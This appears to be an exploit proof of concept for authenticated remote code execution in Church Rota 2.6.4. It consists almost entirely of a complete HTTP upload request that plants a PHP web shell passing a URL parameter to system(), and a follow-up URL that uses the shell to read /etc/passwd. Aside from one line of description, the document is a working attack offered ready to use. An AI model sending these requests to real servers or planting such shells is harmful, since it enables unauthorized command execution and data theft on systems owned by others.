Church Rota version 2.6.4 is vulnerable to authenticated remote code execution. The user does not need to have file upload permission in order to upload and execute an arbitrary file.
POST /resources.php?action=newsent HTTP/1.1
Host: 192.168.43.187
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------36504512417128952451539028145
Content-Length: 526
DNT: 1
Connection: close
Referer: http://192.168.43.187/resources.php?action=new
Upgrade-Insecure-Requests: 1
-----------------------------36504512417128952451539028145
Content-Disposition: form-data; name="resourcename"
test
-----------------------------36504512417128952451539028145
Content-Disposition: form-data; name="resourcefile"; filename="ex.php"
Content-Type: text/plain
<?php
$cmd=$_GET['cmd'];
system($cmd);
?>
-----------------------------36504512417128952451539028145
Content-Disposition: form-data; name="resourcedescription"
<p>pocccc</p>
-----------------------------36504512417128952451539028145--
http://192.168.43.187/documents/ex.php?cmd=cat%20/etc/passwd